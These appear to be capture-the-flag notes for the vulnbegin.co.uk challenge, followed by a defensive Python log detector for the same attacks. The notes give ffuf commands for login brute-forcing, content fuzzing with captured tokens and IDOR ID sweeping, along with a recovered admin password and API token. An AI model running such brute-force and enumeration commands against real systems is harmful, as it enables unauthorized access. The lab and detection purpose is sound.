- Subdomain Discovery
  - Using dnsrecon
    - www.vulnbegin.co.uk
    - server.vulnbegin.co.uk (has a flag and says "Unauthenticated")
  - Searching on crt.sh
    - v64hss83.vulnbegin.co.uk (has a flag)
- Content Discovery
  - Using ffuf
    - /cpadmin/
    - /js/
    - /css/
    - /robots.txt/
  - From /robots.txt
    - /secret_d1rect0y/ (contains a flag)
- Bruteforcing /cpadmin using ffuf
  cmd: ffuf -w ~/wordlists/usernames.txt -X POST -d "username=FUZZ&password=x" -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk -fr 'Username is invalid'
  - Found that admin is a valid username; bruteforced the password and found 159753 working.
  - Found that there is an API key and a config file somewhere on the server, so we need a 2nd round of content discovery with the token we had after logging into the admin account.
    cmd: ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: token=2eff535bd75e77b62c70ba1e4dcb2873; ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnbegin.co.uk/cpadmin/FUZZ -mc all -fc 404
  - Found /env and now investigating it. Found an API token: X-Token: 492E64385D3779BC5F040E2B19D67742
- Recon the API with the token we found.
  - Possible IDOR? Search the space of user IDs.
    cmd: seq 1 100 | ffuf -w - -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://server.vulnbegin.co.uk/user/FUZZ -mc all -fc 404
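From the defender's side, both the /cpadmin credential brute force and the seq-fed /user/ID sweep above leave a recognisable shape in the web server's access log. The following is an added example, not part of the original notes and not code from vulnbegin: it parses a simplified log format (assumed here, not the site's real format), flags one source IP that POSTs to the login path many times inside a short window, and flags a source that walks a run of consecutive numeric object IDs. The thresholds, the log layout and the sample lines are all constructed for the example; the only page-derived values are the paths /cpadmin and /user/.

```python
"""Detect the two enumeration patterns the ffuf runs above would leave in an
access log: repeated POST logins to /cpadmin from one source and a sweep over
consecutive numeric object IDs under /user/."""
import re
from collections import defaultdict

# Assumed, simplified log line: <ip> [HH:MM:SS] "<METHOD> <path>" <status> "<user-agent>"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<time>\d\d:\d\d:\d\d)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def _seconds(hhmmss):
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["t"] = _seconds(d["time"])
    d["status"] = int(d["status"])
    return d


def detect_login_bruteforce(entries, path="/cpadmin", threshold=10, window=60):
    """Flag IPs that POST to the login path at least `threshold` times within any
    `window`-second span. The ffuf run above filters on the response body, so a
    failed login is still a 200: the rate, not the status code, is the signal."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"] == path:
            by_ip[e["ip"]].append(e["t"])
    hits = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[ip] = max(hits.get(ip, 0), count)
    return hits


def detect_id_enumeration(entries, prefix="/user/", min_ids=20, min_consecutive_ratio=0.8):
    """Flag IPs that request many distinct numeric IDs under `prefix` where most
    adjacent IDs (sorted) differ by exactly 1, the signature of `seq` piped into
    a fuzzer. Both 200s and 404s are counted: the sweep is the event."""
    ids_by_ip = defaultdict(set)
    for e in entries:
        if e["path"].startswith(prefix) and e["path"][len(prefix):].isdigit():
            ids_by_ip[e["ip"]].add(int(e["path"][len(prefix):]))
    hits = {}
    for ip, ids in ids_by_ip.items():
        if len(ids) < min_ids:
            continue
        ordered = sorted(ids)
        steps = [b - a for a, b in zip(ordered, ordered[1:])]
        if sum(1 for s in steps if s == 1) / len(steps) >= min_consecutive_ratio:
            hits[ip] = (len(ids), ordered[0], ordered[-1])
    return hits


def analyze(log_text):
    """Run every rule over the log text; returns {rule_name: findings}."""
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return {
        "login_bruteforce": detect_login_bruteforce(entries),
        "id_enumeration": detect_id_enumeration(entries),
        # ffuf's default User-Agent starts with this string (a weak, easily changed signal)
        "fuzzer_user_agents": sorted({e["ip"] for e in entries
                                      if e["ua"].startswith("Fuzz Faster U Fool")}),
    }


# Constructed sample log (not captured from the page's target): one fuzzing
# source at 10.0.0.5 and one ordinary browser session at 10.0.0.9.
def _line(ip, t, method, path, status, ua):
    return f'{ip} [{t // 3600:02d}:{t % 3600 // 60:02d}:{t % 60:02d}] "{method} {path}" {status} "{ua}"'


FUZZ_UA = "Fuzz Faster U Fool v2.1.0"
BROWSER_UA = "Mozilla/5.0"
T0 = 10 * 3600  # 10:00:00
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", T0 + i, "POST", "/cpadmin", 200, FUZZ_UA) for i in range(15)]
    + [_line("10.0.0.5", T0 + 120 + i, "GET", f"/user/{i + 1}", 200 if i % 4 else 404, FUZZ_UA)
       for i in range(30)]
    + [_line("10.0.0.9", T0 + 5, "GET", "/", 200, BROWSER_UA),
       _line("10.0.0.9", T0 + 30, "POST", "/cpadmin", 302, BROWSER_UA),
       _line("10.0.0.9", T0 + 31, "GET", "/user/7", 200, BROWSER_UA)]
)

if __name__ == "__main__":
    for rule, findings in analyze(SAMPLE_LOG).items():
        print(rule, findings)
```

On the sample log, `analyze` reports 10.0.0.5 for 15 login POSTs inside one window and for a sweep of 30 consecutive IDs, while the browser session at 10.0.0.9 is not flagged. The notes above run ffuf with `-t 1 -p 0.1`, i.e. single-threaded with a delay; the rate rule still fires because a 60-second window comfortably holds more than the threshold, which is why window-based counting is preferable to a per-second rate. The User-Agent rule is included only as a low-confidence corroborating signal, since it is trivially changed.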